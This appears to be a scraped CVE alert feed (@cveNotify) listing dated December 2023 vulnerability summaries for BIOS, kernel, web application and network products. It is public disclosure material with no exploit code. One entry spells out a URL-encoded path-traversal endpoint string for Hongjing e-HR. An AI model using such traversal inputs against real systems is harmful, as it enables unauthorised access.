🚨 CVE-2023-39539AMI AptioV contains a vulnerability in BIOS where a User may cause an unrestricted upload of a PNG Logo file with dangerous type by Local access. A successful exploit of this vulnerability may lead to a loss of Confidentiality, Integrity, and/or Availability.🎖@cveNotify |
|
| 2023-12-15 23:24:32 |
🚨 CVE-2023-27317ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives.🎖@cveNotify |
|
| 2023-12-15 22:24:32 |
🚨 CVE-2023-0248An attacker with physical access to the Kantech Gen1 ioSmart card reader with firmware version prior to 1.07.02 in certain circumstances can recover the reader's communication memory between the card and reader.🎖@cveNotify |
|
| 2023-12-15 21:24:38 |
🚨 CVE-2023-50264Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.🎖@cveNotify |
|
| 2023-12-15 21:24:33 |
🚨 CVE-2023-47323The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators.🎖@cveNotify |
|
| 2023-12-15 21:24:32 |
🚨 CVE-2023-47321Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control via the "Porlet Deployer" which allows administrators to deploy .WAR portlets.🎖@cveNotify |
|
| 2023-12-15 20:54:33 |
🚨 CVE-2023-47320Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control. An attacker with low privileges is able to execute the administrator-only function of putting the application in "Maintenance Mode" due to broken access control. This makes the application unavailable to all users. This affects Silverpeas Core 6.3.1 and below.🎖@cveNotify |
|
| 2023-12-15 20:54:32 |
🚨 CVE-2023-6379Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to a victim and partially take control of their browsing session.🎖@cveNotify |
|
| 2023-12-15 20:24:45 |
🚨 CVE-2023-48782A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters🎖@cveNotify |
|
| 2023-12-15 20:24:39 |
🚨 CVE-2023-49297PyDrive2 is a wrapper library of google-api-python-client that simplifies many common Google Drive API V2 tasks. Unsafe YAML deserilization will result in arbitrary code execution. A maliciously crafted YAML file can cause arbitrary code execution if PyDrive2 is run in the same directory as it, or if it is loaded in via `LoadSettingsFile`. This is a deserilization attack that will affect any user who initializes GoogleAuth from this package while a malicious yaml file is present in the same directory. This vulnerability does not require the file to be directly loaded through the code, only present. This issue has been addressed in commit `c57355dc` which is included in release version `1.16.2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-15 20:24:38 |
🚨 CVE-2023-36407Windows Hyper-V Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-15 20:24:33 |
🚨 CVE-2023-36404Windows Kernel Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-15 20:24:32 |
🚨 CVE-2022-24480Outlook for Android Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-12-15 19:54:39 |
🚨 CVE-2023-41844A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiSandbox version 4.4.1 and 4.4.0 and 4.2.0 through 4.2.5 and 4.0.0 through 4.0.3 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 and 3.0.0 through 3.0.4 allows attacker to execute unauthorized code or commands via crafted HTTP requests in capture traffic endpoint.🎖@cveNotify |
|
| 2023-12-15 19:54:38 |
🚨 CVE-2023-35621Microsoft Dynamics 365 Finance and Operations Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-12-15 19:54:33 |
🚨 CVE-2023-36428Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-15 19:54:32 |
🚨 CVE-2023-36427Windows Hyper-V Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-15 19:24:50 |
🚨 CVE-2023-50721XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn't properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user's profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be applied manually applied to the page `XWiki.SearchAdmin`.🎖@cveNotify |
|
| 2023-12-15 19:24:45 |
🚨 CVE-2023-50719XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-15 19:24:44 |
🚨 CVE-2023-45864A race condition issue discovered in Samsung Mobile Processor Exynos 9820, 980, 1080, 2100, 2200, 1280, and 1380 allows unintended modifications of values within certain areas.🎖@cveNotify |
|
| 2023-12-15 19:24:39 |
🚨 CVE-2023-21740Windows Media Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-15 19:24:38 |
🚨 CVE-2016-9952The verify_certificate function in lib/vtls/schannel.c in libcurl 7.30.0 through 7.51.0, when built for Windows CE using the schannel TLS backend, makes it easier for remote attackers to conduct man-in-the-middle attacks via a crafted wildcard SAN in a server certificate, as demonstrated by "*.com."🎖@cveNotify |
|
| 2023-12-15 19:24:33 |
🚨 CVE-2006-7031Microsoft Internet Explorer 6.0.2900 SP2 and earlier allows remote attackers to cause a denial of service (crash) via a table element with a CSS attribute that sets the position, which triggers an "unhandled exception" in mshtml.dll.🎖@cveNotify |
|
| 2023-12-15 19:24:32 |
🚨 CVE-2001-0162WinCE 3.0.9348 generates predictable TCP Initial Sequence Numbers (ISNs), which allows remote attackers to spoof or hijack TCP connections.🎖@cveNotify |
|
| 2023-12-15 18:54:38 |
🚨 CVE-2023-36639A use of externally-controlled format string in Fortinet FortiProxy versions 7.2.0 through 7.2.4, 7.0.0 through 7.0.10, FortiOS versions 7.4.0, 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.12, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiPAM versions 1.0.0 through 1.0.3 allows attacker to execute unauthorized code or commands via specially crafted API requests.🎖@cveNotify |
|
| 2023-12-15 18:54:33 |
🚨 CVE-2023-45800Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hanbiro Hanbiro groupware allows Information Elicitation.This issue affects Hanbiro groupware: from V3.8.79 before V3.8.81.1.🎖@cveNotify |
|
| 2023-12-15 18:24:38 |
🚨 CVE-2023-6760A vulnerability classified as critical was found in Thecosy IceCMS up to 2.0.1. This vulnerability affects unknown code. The manipulation leads to manage user sessions. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247888.🎖@cveNotify |
|
| 2023-12-15 18:24:33 |
🚨 CVE-2023-5156A flaw was found in the GNU C Library. A recent fix for CVE-2023-4806 introduced the potential for a memory leak, which may result in an application crash.🎖@cveNotify |
|
| 2023-12-15 18:24:32 |
🚨 CVE-2023-24934Microsoft Defender Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-12-15 17:54:32 |
🚨 CVE-2023-50251php-svg-lib is an SVG file parsing / rendering library. Prior to version 0.5.1, when parsing the attributes passed to a `use` tag inside an svg document, an attacker can cause the system to go to an infinite recursion. Depending on the system configuration and attack pattern this could exhaust the memory available to the executing process and/or to the server itself. An attacker sending multiple request to a system to render the above payload can potentially cause resource exhaustion to the point that the system is unable to handle incoming request. Version 0.5.1 contains a patch for this issue.🎖@cveNotify |
|
| 2023-12-15 17:24:33 |
🚨 CVE-2023-50089A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication.🎖@cveNotify |
|
| 2023-12-15 17:24:32 |
🚨 CVE-2021-1585A vulnerability in the Cisco Adaptive Security Device Manager (ASDM) Launcher could allow an unauthenticated, remote attacker to execute arbitrary code on a user's operating system. This vulnerability is due to a lack of proper signature verification for specific code exchanged between the ASDM and the Launcher. An attacker could exploit this vulnerability by leveraging a man-in-the-middle position on the network to intercept the traffic between the Launcher and the ASDM and then inject arbitrary code. A successful exploit could allow the attacker to execute arbitrary code on the user's operating system with the level of privileges assigned to the ASDM Launcher. A successful exploit may require the attacker to perform a social engineering attack to persuade the user to initiate communication from the Launcher to the ASDM.🎖@cveNotify |
|
| 2023-12-15 16:54:33 |
🚨 CVE-2023-50422SAP BTP Security Services Integration Library ([Java] cloud-security-services-integration-library) - versions below 2.17.0 and versions from 3.0.0 to before 3.3.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.🎖@cveNotify |
|
| 2023-12-15 16:54:32 |
🚨 CVE-2022-27140An arbitrary file upload vulnerability in the file upload module of express-fileupload 1.3.1 allows attackers to execute arbitrary code via a crafted PHP file. NOTE: the vendor's position is that the observed behavior can only occur with "intentional misusing of the API": the express-fileupload middleware is not responsible for an application's business logic (e.g., determining whether or how a file should be renamed).🎖@cveNotify |
|
| 2023-12-15 16:24:33 |
🚨 CVE-2014-2851Integer overflow in the ping_init_sock function in net/ipv4/ping.c in the Linux kernel through 3.14.1 allows local users to cause a denial of service (use-after-free and system crash) or possibly gain privileges via a crafted application that leverages an improperly managed reference counter.🎖@cveNotify |
|
| 2023-12-15 16:24:32 |
🚨 CVE-2013-6763The uio_mmap_physical function in drivers/uio/uio.c in the Linux kernel before 3.12 does not validate the size of a memory block, which allows local users to cause a denial of service (memory corruption) or possibly gain privileges via crafted mmap operations, a different vulnerability than CVE-2013-4511.🎖@cveNotify |
|
| 2023-12-15 15:54:46 |
🚨 CVE-2023-2163Incorrect verifier pruning in BPF in Linux Kernel >=5.4 leads to unsafecode paths being incorrectly marked as safe, resulting in arbitrary read/write inkernel memory, lateral privilege escalation, and container escape.🎖@cveNotify |
|
| 2023-12-15 15:54:42 |
🚨 CVE-2023-38428An issue was discovered in the Linux kernel before 6.3.4. fs/ksmbd/smb2pdu.c in ksmbd does not properly check the UserName value because it does not consider the address of security buffer, leading to an out-of-bounds read.🎖@cveNotify |
|
| 2023-12-15 15:54:41 |
🚨 CVE-2019-14835A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel's vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host.🎖@cveNotify |
|
| 2023-12-15 15:54:40 |
🚨 CVE-2013-4511Multiple integer overflows in Alchemy LCD frame-buffer drivers in the Linux kernel before 3.12 allow local users to create a read-write memory mapping for the entirety of kernel memory, and consequently gain privileges, via crafted mmap operations, related to the (1) au1100fb_fb_mmap function in drivers/video/au1100fb.c and the (2) au1200fb_fb_mmap function in drivers/video/au1200fb.c.🎖@cveNotify |
|
| 2023-12-15 15:24:54 |
🚨 CVE-2023-49174Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS.This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5.🎖@cveNotify |
|
| 2023-12-15 15:24:53 |
🚨 CVE-2023-49169Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS.This issue affects Ads by datafeedr.Com: from n/a through 1.2.0.🎖@cveNotify |
|
| 2023-12-15 15:24:52 |
🚨 CVE-2023-49786Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.🎖@cveNotify |
|
| 2023-12-15 15:24:49 |
🚨 CVE-2023-47081Adobe Substance 3D Stager versions 2.1.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-15 15:24:48 |
🚨 CVE-2023-47078Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-15 15:24:47 |
🚨 CVE-2023-47062Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-15 15:24:44 |
🚨 CVE-2023-47061Adobe Dimension versions 3.4.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-15 15:24:43 |
🚨 CVE-2023-35643DHCP Server Service Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-12-15 15:24:42 |
🚨 CVE-2023-35642Internet Connection Sharing (ICS) Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-12-15 15:24:39 |
🚨 CVE-2023-35641Internet Connection Sharing (ICS) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-15 15:24:38 |
🚨 CVE-2023-4932SAS application is vulnerable to Reflected Cross-Site Scripting (XSS). Improper input validation in the `_program` parameter of the the `/SASStoredProcess/do` endpoint allows arbitrary JavaScript to be executed when specially crafted URL is opened by an authenticated user. The attack is possible from a low-privileged user. Only versions 9.4_M7 and 9.4_M8 were tested and confirmed to be vulnerable, status of others is unknown. For above mentioned versions hot fixes were published.🎖@cveNotify |
|
| 2023-12-15 15:24:37 |
🚨 CVE-2022-48615An improper access control vulnerability exists in a Huawei datacom product. Attackers can exploit this vulnerability to obtain partial device information.🎖@cveNotify |
|
| 2023-12-14 17:47:10 |
🚨 CVE-2023-6647A vulnerability, which was classified as critical, has been found in AMTT HiBOS 1.0. Affected by this issue is some unknown functionality. The manipulation of the argument Type leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247340. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-14 17:17:29 |
🚨 CVE-2023-49149Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CurrencyRate.Today Currency Converter Calculator allows Stored XSS.This issue affects Currency Converter Calculator: from n/a through 1.3.1.🎖@cveNotify |
|
| 2023-12-14 17:17:28 |
🚨 CVE-2023-48770Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nima Saberi Aparat allows Stored XSS.This issue affects Aparat: from n/a through 1.7.1.🎖@cveNotify |
|
| 2023-12-14 17:17:27 |
🚨 CVE-2023-48767Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Raghu Goriya MyTube PlayList allows Reflected XSS.This issue affects MyTube PlayList: from n/a through 2.0.3.🎖@cveNotify |
|
| 2023-12-14 17:17:24 |
🚨 CVE-2023-48756Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetBlocks For Elementor allows Reflected XSS.This issue affects JetBlocks For Elementor: from n/a through 1.3.8.🎖@cveNotify |
|
| 2023-12-14 17:17:23 |
🚨 CVE-2023-47261Dokmee ECM 7.4.6 allows remote code execution because the response to a GettingStarted/SaveSQLConnectionAsync /#/gettingstarted request contains a connection string for privileged SQL Server database access, and xp_cmdshell can be enabled.🎖@cveNotify |
|
| 2023-12-14 17:17:22 |
🚨 CVE-2023-42800Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit 50c0a51b10ecc5b3415ea78c21d96d679e2288f9 due to unmitigated usage of unsafe C functions and improper bounds checking. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client, or achieve remote code execution (RCE) on the client (with insufficient exploit mitigations or if mitigations can be bypassed). The bug was addressed in commit 24750d4b748fefa03d09fcfd6d45056faca354e0.🎖@cveNotify |
|
| 2023-12-14 17:17:17 |
🚨 CVE-2023-41116An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It allows an authenticated user to refresh any materialized view, regardless of that user's permissions.🎖@cveNotify |
|
| 2023-12-14 17:17:16 |
🚨 CVE-2023-41113An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It allows an authenticated user to to obtain information about whether certain files exist on disk, what errors if any occur when attempting to read them, and some limited information about their contents (regardless of permissions). This can occur when a superuser has configured one or more directories for filesystem access via CREATE DIRECTORY and adopted certain non-default settings for log_line_prefix and log_connections.🎖@cveNotify |
|
| 2023-12-14 17:17:11 |
🚨 CVE-2023-6655A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-14 17:17:10 |
🚨 CVE-2023-39214Exposure of sensitive information in Zoom Client SDK's before 5.15.5 may allow an authenticated user to enable a denial of service via network access.🎖@cveNotify |
|
| 2023-12-14 15:17:34 |
🚨 CVE-2023-50368Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Averta Shortcodes and extra features for Phlox theme allows Stored XSS.This issue affects Shortcodes and extra features for Phlox theme: from n/a through 2.15.2.🎖@cveNotify |
|
| 2023-12-14 15:17:32 |
🚨 CVE-2023-49847Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Twinpictures Annual Archive allows Stored XSS.This issue affects Annual Archive: from n/a through 1.6.0.🎖@cveNotify |
|
| 2023-12-14 15:17:31 |
🚨 CVE-2023-49836Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brontobytes Cookie Bar allows Stored XSS.This issue affects Cookie Bar: from n/a through 2.0.🎖@cveNotify |
|
| 2023-12-14 15:17:30 |
🚨 CVE-2023-48676Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 36943.🎖@cveNotify |
|
| 2023-12-14 15:17:26 |
🚨 CVE-2023-46144A download of code without integrity check vulnerability in PLCnext products allows an remote attacker with low privileges to compromise integrity on the affected engineering station and the connected devices.🎖@cveNotify |
|
| 2023-12-14 15:17:25 |
🚨 CVE-2023-46142A incorrect permission assignment for critical resource vulnerability in PLCnext products allows an remote attacker with low privileges to gain full access on the affected devices.🎖@cveNotify |
|
| 2023-12-14 15:17:24 |
🚨 CVE-2023-45185IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to execute remote code. Due to improper authority checks the attacker could perform operations on the PC under the user's authority. IBM X-Force ID: 268273.🎖@cveNotify |
|
| 2023-12-14 15:17:20 |
🚨 CVE-2023-0757Incorrect Permission Assignment for Critical Resource vulnerability in PHOENIX CONTACT MULTIPROG, PHOENIX CONTACT ProConOS eCLR (SDK) allows an unauthenticated remote attacker to upload arbitrary malicious code and gain full access on the affected device.🎖@cveNotify |
|
| 2023-12-14 15:17:19 |
🚨 CVE-2023-42900The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2023-12-14 15:17:18 |
🚨 CVE-2023-48715Tuleap is an open source suite to improve management of software developments and collaboration. Prior to version 15.2.99.103 or Tuleap Community Edition and prior to versions 15.2-4 and 15.1-8 of Tuleap Enterprise Edition, the name of the releases are not properly escaped on the edition page of a release. A malicious user with the ability to create a FRS release could force a victim having write permissions in the FRS to execute uncontrolled code. Tuleap Community Edition 15.2.99.103, Tuleap Enterprise Edition 15.2-4, and Tuleap Enterprise Edition 15.1-8 contain a fix for this issue.🎖@cveNotify |
|
| 2023-12-14 15:17:15 |
🚨 CVE-2023-45866Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue.🎖@cveNotify |
|
| 2023-12-14 15:17:14 |
🚨 CVE-2023-32460Dell PowerEdge BIOS contains an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation.🎖@cveNotify |
|
| 2023-12-14 15:17:13 |
🚨 CVE-2023-37858In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 an authenticated, remote attacker with admin privileges is able to read hardcoded cryptographic keys allowing to decrypt an encrypted web application login password.🎖@cveNotify |
|
| 2023-12-14 14:17:14 |
🚨 CVE-2015-8963Race condition in kernel/events/core.c in the Linux kernel before 4.4 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging incorrect handling of an swevent data structure during a CPU unplug operation.🎖@cveNotify |
|
| 2023-12-14 14:17:13 |
🚨 CVE-2015-3183The chunked transfer coding implementation in the Apache HTTP Server before 2.4.14 does not properly parse chunk headers, which allows remote attackers to conduct HTTP request smuggling attacks via a crafted request, related to mishandling of large chunk-size values and invalid chunk-extension characters in modules/http/http_filters.c.🎖@cveNotify |
|
| 2023-12-14 13:17:11 |
🚨 CVE-2023-6570Server-Side Request Forgery (SSRF) in kubeflow/kubeflow🎖@cveNotify |
|
| 2023-12-14 13:17:10 |
🚨 CVE-2023-48631@adobe/css-tools versions 4.3.1 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS.🎖@cveNotify |
|
| 2023-12-14 10:17:21 |
🚨 CVE-2023-50164An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.🎖@cveNotify |
|
| 2023-12-14 10:17:17 |
🚨 CVE-2023-46589Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.🎖@cveNotify |
|
| 2023-12-14 10:17:16 |
🚨 CVE-2023-45283The filepath package does not recognize paths with a \??\ prefix as special. On Windows, a path beginning with \??\ is a Root Local Device path equivalent to a path beginning with \\?\. Paths with a \??\ prefix may be used to access arbitrary locations on the system. For example, the path \??\c:\x is equivalent to the more common path c:\x. Before fix, Clean could convert a rooted path such as \a\..\??\b into the root local device path \??\b. Clean will now convert this to .\??\b. Similarly, Join(\, ??, b) could convert a seemingly innocent sequence of path elements into the root local device path \??\b. Join will now convert this to \.\??\b. In addition, with fix, IsAbs now correctly reports paths beginning with \??\ as absolute, and VolumeName correctly reports the \??\ prefix as a volume name. UPDATE: Go 1.20.11 and Go 1.21.4 inadvertently changed the definition of the volume name in Windows paths starting with \?, resulting in filepath.Clean(\?\c:) returning \?\c: rather than \?\c:\ (among other effects). The previous behavior has been restored.🎖@cveNotify |
|
| 2023-12-14 10:17:15 |
🚨 CVE-2023-5978In versions of FreeBSD 13-RELEASE before 13-RELEASE-p5, under certain circumstances the cap_net libcasper(3) service incorrectly validates that updated constraints are strictly subsets of the active constraints. When only a list of resolvable domain names was specified without setting any other limitations, an application could submit a new list of domains including include entries not previously listed. This could permit the application to resolve domain names that were previously restricted.🎖@cveNotify |
|
| 2023-12-14 10:17:12 |
🚨 CVE-2023-5941In versions of FreeBSD 12.4-RELEASE prior to 12.4-RELEASE-p7 and FreeBSD 13.2-RELEASE prior to 13.2-RELEASE-p5 the __sflush() stdio function in libc does not correctly update FILE objects' write space members for write-buffered streams when the write(2) system call returns an error. Depending on the nature of an application that calls libc's stdio functions and the presence of errors returned from the write(2) system call (or an overridden stdio write routine) a heap buffer overflow may occur. Such overflows may lead to data corruption or the execution of arbitrary code at the privilege level of the calling program.🎖@cveNotify |
|
| 2023-12-14 10:17:11 |
🚨 CVE-2023-46848Squid is vulnerable to Denial of Service, where a remote attacker can perform DoS by sending ftp:// URLs in HTTP Request messages or constructing ftp:// URLs from FTP Native input.🎖@cveNotify |
|
| 2023-12-14 10:17:10 |
🚨 CVE-2023-46695An issue was discovered in Django 3.2 before 3.2.23, 4.1 before 4.1.13, and 4.2 before 4.2.7. The NFKC normalization is slow on Windows. As a consequence, django.contrib.auth.forms.UsernameField is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.🎖@cveNotify |
|
| 2023-12-14 09:17:22 |
🚨 CVE-2023-49708SQLi vulnerability in Starshop component for Joomla.🎖@cveNotify |
|
| 2023-12-14 09:17:21 |
🚨 CVE-2023-48925SQL injection vulnerability in Buy Addons bavideotab before version 1.0.6, allows attackers to escalate privileges and obtain sensitive information via the component BaVideoTabSaveVideoModuleFrontController::run().🎖@cveNotify |
|
| 2023-12-14 09:17:20 |
🚨 CVE-2023-46750URL Redirection to Untrusted Site ('Open Redirect') vulnerability when "form" authentication is used in Apache Shiro.Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+.🎖@cveNotify |
|
| 2023-12-14 09:17:17 |
🚨 CVE-2023-46348SQL njection vulnerability in SunnyToo sturls before version 1.1.13, allows attackers to escalate privileges and obtain sensitive information via StUrls::hookActionDispatcher and StUrls::getInstanceId methods.🎖@cveNotify |
|
| 2023-12-14 09:17:16 |
🚨 CVE-2023-40658A reflected XSS vulnerability was discovered in the Clicky Analytics Dashboard module for Joomla.🎖@cveNotify |
|
| 2023-12-14 09:17:15 |
🚨 CVE-2023-40656A reflected XSS vulnerability was discovered in the Quickform component for Joomla.🎖@cveNotify |
|
| 2023-12-14 09:17:11 |
🚨 CVE-2023-40629SQLi vulnerability in LMS Lite component for Joomla.🎖@cveNotify |
|
| 2023-12-14 09:17:10 |
🚨 CVE-2023-40627A reflected XSS vulnerability was discovered in the LivingWord component for Joomla.🎖@cveNotify |
|
| 2023-12-14 08:17:27 |
🚨 CVE-2023-25643There is a command injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of multiple network parameters, an authenticated attacker could use the vulnerability to execute arbitrary commands.🎖@cveNotify |
|
| 2023-12-14 08:17:22 |
🚨 CVE-2023-1904In affected versions of Octopus Server it is possible for the OpenID client secret to be logged in clear text during the configuration of Octopus Server.🎖@cveNotify |
|
| 2023-12-14 08:17:21 |
🚨 CVE-2023-46387LOYTEC electronics GmbH LINX-212 firmware 6.2.4 and LINX-151 firmware 7.2.4 are vulnerable to Incorrect Access Control via dpal_config.zml file. This vulnerability allows remote attackers to disclose sensitive information on Loytec device data point configuration.🎖@cveNotify |
|
| 2023-12-14 08:17:17 |
🚨 CVE-2023-46385LOYTEC electronics GmbH LINX Configurator 7.4.10 is vulnerable to Insecure Permissions. An admin credential is passed as a value of URL parameters without encryption, so it allows remote attackers to steal the password and gain full control of Loytec device configuration.🎖@cveNotify |
|
| 2023-12-14 08:17:16 |
🚨 CVE-2023-46382LOYTEC LINX-212 firmware 6.2.4 and LVIS-3ME12-A1 firmware 6.2.2 and LIOB-586 firmware 6.2.3 devices use cleartext HTTP for login.🎖@cveNotify |
|
| 2023-12-14 08:17:11 |
🚨 CVE-2023-46380LOYTEC LINX-212 firmware 6.2.4 and LVIS-3ME12-A1 firmware 6.2.2 and LIOB-586 firmware 6.2.3 devices send password-change requests via cleartext HTTP.🎖@cveNotify |
|
| 2023-12-14 08:17:10 |
🚨 CVE-2023-40997Buffer Overflow vulnerability in O-RAN Software Community ric-plt-lib-rmr v.4.9.0 allows a remote attacker to cause a denial of service via a crafted packet.🎖@cveNotify |
|
| 2023-12-14 07:17:16 |
